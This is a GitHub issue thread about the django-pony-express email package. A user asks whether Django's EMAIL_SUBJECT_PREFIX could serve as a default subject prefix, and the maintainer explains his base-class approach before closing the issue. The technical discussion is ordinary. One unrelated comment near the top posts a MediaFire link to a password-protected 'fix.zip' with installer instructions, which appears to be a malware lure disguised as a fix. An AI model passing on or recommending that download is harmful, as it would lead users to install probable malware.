### ISSUE TITLE
Use EMAIL_SUBJECT_PREFIX from Django settings if prefix is not set in EmailService

### ISSUE THREAD

**Issue by jimmyl0l3c** [ambient-innovation/django-pony-express#18]
What about using the [EMAIL_SUBJECT_PREFIX](https://docs.djangoproject.com/en/5.1/ref/settings/#email-subject-prefix) from Django settings if `SUBJECT_PREFIX` is not specified in the EmailService? Similarly to `FROM_EMAIL` and `DEFAULT_FROM_EMAIL`. 

Btw. thanks for this great package.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GitRon** [comment]
Hi @jimmyl0l3c !

Thx for the flowers! 

I like the idea but the thing is that this variable has a default which probably most people don't want to use. Therefore, personally I find it hard to use this as a default. Whats your take on this?

Best from Cologne  
Ronny

**Comment by jimmyl0l3c** [comment]
Hi, yeah I can see why. In that case I would welcome a global default, something like `DJANGO_PONY_EXPRESS_DEFAULT_SUBJECT_PREFIX` for example.

**Comment by GitRon** [comment]
Hi! Sounds like an interesting idea. How would that global prefix work in comparison to the currently implemented version? I used it as follows:

* I have a project "FancyWebShop"
* I want all my mails to look like "FancyWebShop.com - Account created"  etc
* Therefore I set the PREFIX to "FancyWebShop.com"
* I'm happy

How would your global prefix defer from that? 🙂

**Comment by jimmyl0l3c** [comment]
I may have misunderstood the docs then, but I have multiple subclasses of `BaseEmailService`, each representing different email type (Account created, Password reset, etc). If I want to set the same prefix to all of them, I have to set `PREFIX` in each of them ([django_pony_express/services/base.py#L111](https://github.com/ambient-innovation/django-pony-express/blob/master/django_pony_express/services/base.py#L111)), or make a new base class they will inherit from. But I prefer the global prefix over another layer of inheritance.

Or am I missing something? 🤔

**Comment by GitRon** [comment]
@jimmyl0l3c I create one base class for my project, but depending on the size and the contextual domains in your application, there could be more. This being said, I have one base class where I set my prefix and then all my emails inherit from this one. Therefore, this acts as my "global" default.

My theory is that you need this base class anyway because you want to avoid setting your context data variables for your base template (like unsubscribe link, header image, color settings... name it) per email. This is very tedious and error-prone. Therefore my working thesis was that everybody has a global prefix anyway.

To sum up: All my custom emails inherit from my base class which inherits from `BaseEmailService`. My custom base class contains all things I want in every mail like subject prefix, reply to header, context data etc.

I know that this is a level of inheritance but I feel that it's more explict than having settings variables or something like a context processor for all the cases you'd cover with a custom base class. 

What do you think?

**Comment by jimmyl0l3c** [comment]
@GitRon I see. In my use case it made more sense to create a base class for factories, because I mainly send emails related to products that the users are owners/subscribers of and the contextual data are not specific per recipient, but per product. And I cannot use the base factory to set the subject prefix.

For me the option to set it globally (or through factory) would be nice, but I am fine without it. Feel free to close this issue if you dont want to add it. 😉

**Comment by GitRon** [comment]
@jimmyl0l3c Got it. Well, I think creating a global constant and import it in your classes might be as valid as adding it to this package, right? Don't see a real downside to it. 

So, thanks for using the package, glad you like it and I'll close this issue.

Feel free to create a new one when you find something.
